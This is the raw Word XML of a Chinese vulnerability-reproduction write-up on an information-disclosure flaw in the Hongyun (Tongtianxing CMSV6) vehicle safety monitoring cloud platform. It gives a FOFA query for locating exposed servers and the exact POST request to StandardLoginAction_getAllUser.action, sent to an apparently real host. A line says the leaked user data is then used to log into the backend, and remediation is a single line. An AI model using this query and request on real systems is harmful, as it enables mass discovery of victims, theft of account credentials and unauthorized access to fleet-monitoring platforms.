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215E" w14:textId="77777777" w:rsidR="00CD2839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1、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>√</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>鸿运(通天星CMSV6车载)主动安全监控云平台敏感信息泄露漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BCE02C" w14:textId="77777777" w:rsidR="00CD2839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r1mnK"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1. 鸿运(通天星CMSV6车载)主动安全监控云平台简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F0EDB2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1" w:name="u27b897a4"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>鸿运(通天星CMSV6车载)主动安全监控云平台实现对计算资源、存储资源、网络资源、</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>云应用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控，保障IT系统安全、稳定、可靠运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDBAD49" w14:textId="77777777" w:rsidR="00CD2839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2" w:name="WjcbZ"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2993D1BE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3" w:name="u7b0e3b2a"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>鸿运主动安全监控云平台实现对计算资源、存储资源、网络资源、</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>云应用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务进行7*24小时全时区、多地域、全方位、立体式、智能化的IT运维监控，保障IT系统安全、稳定、可靠运行。鸿运(通天星CMSV6车载)主动安全监控云平台存在敏感信息泄露漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E22231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4" w:name="u7a937694"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CVE编号:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C46862B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5" w:name="u5d41ded9"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CNNVD编号:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48960DB1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6" w:name="u10780b31"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CNVD编号:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F98129F" w14:textId="77777777" w:rsidR="00CD2839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7" w:name="OfpOZ"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480F3700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8" w:name="u150ee403"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>鸿运(通天星CMSV6车载)主动安全监控云平台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABDE1A8" w14:textId="77777777" w:rsidR="00CD2839" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="u3cd39c9b"/>
      <w:bookmarkStart w:id="10" w:name="u18af9785"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B86E20B" wp14:editId="309AC226">
            <wp:extent cx="5841999" cy="2786324"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="904603842" name="图片 90460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8934" cy="40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318697AA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11" w:name="u62d355a8"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>鸿运(通天星CMSV6车载)主动安全监控云平台存在敏感信息泄露漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13751FFD" w14:textId="77777777" w:rsidR="00CD2839" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="wJyPN"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>4.fofa查询语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F58EE7A" w14:textId="77777777" w:rsidR="00CD2839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13" w:name="ObYjF"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>body="./open/webApi.html" || body="/808gps/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C16F52" w14:textId="77777777" w:rsidR="00CD2839" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="ZCKNn"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>5.漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D8950C" w14:textId="77777777" w:rsidR="00CD2839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15" w:name="FwYy4"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>漏洞链接</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>http://127.0.0.1/808gps/StandardLoginAction_getAllUser.action</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DADBA8" w14:textId="77777777" w:rsidR="00CD2839" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="uff6ea04c"/>
      <w:bookmarkEnd w:id="15"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>漏洞数据包</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E297DE5" w14:textId="77777777" w:rsidR="00CD2839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17" w:name="rPGFh"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /808gps/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>StandardLoginAction_getAllUser.action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HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, deflate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Accept: */*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Host: 62.171.150.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Length: 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>=null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CF8712" w14:textId="77777777" w:rsidR="00CD2839" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="u14e487e3"/>
      <w:bookmarkStart w:id="19" w:name="u70a81b0f"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C16F2EA" wp14:editId="5771BCF2">
            <wp:extent cx="5842000" cy="2593848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1012606152" name="图片 101260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3C7D7EF4" w14:textId="77777777" w:rsidR="00CD2839" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="u8f939a79"/>
      <w:bookmarkStart w:id="21" w:name="u74764c3d"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用泄露的信息登录后台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357C2012" w14:textId="77777777" w:rsidR="00CD2839" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="ub0a6723f"/>
      <w:bookmarkStart w:id="23" w:name="u0bcbf013"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="416A63C2" wp14:editId="2981ED22">
            <wp:extent cx="5841999" cy="549086"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1440552290" name="图片 14405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8934" cy="7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75E72CAD" w14:textId="77777777" w:rsidR="00CD2839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24" w:name="wtM4k"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>6.整改意见</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E92A9BF" w14:textId="57AF9AEA" w:rsidR="00CD2839" w:rsidRDefault="00000000" w:rsidP="005B7A56">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:before="240" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="u79918c25"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请联系厂商打补丁或者升级到最新版本。</w:t>
      </w:r>
      <w:bookmarkStart w:id="26" w:name="u80a264cf"/>
      <w:bookmarkStart w:id="27" w:name="CHkLA"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:sectPr w:rsidR="00CD2839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CD2839"/>
    <w:rsid w:val="0046229A"/>
    <w:rsid w:val="005B7A56"/>
    <w:rsid w:val="00C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FEBE"/>
  <w15:docId w15:val="{F68CB3FA-6174-4D39-A5EE-57CEAEE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2024-06-27T13:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-27T13:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>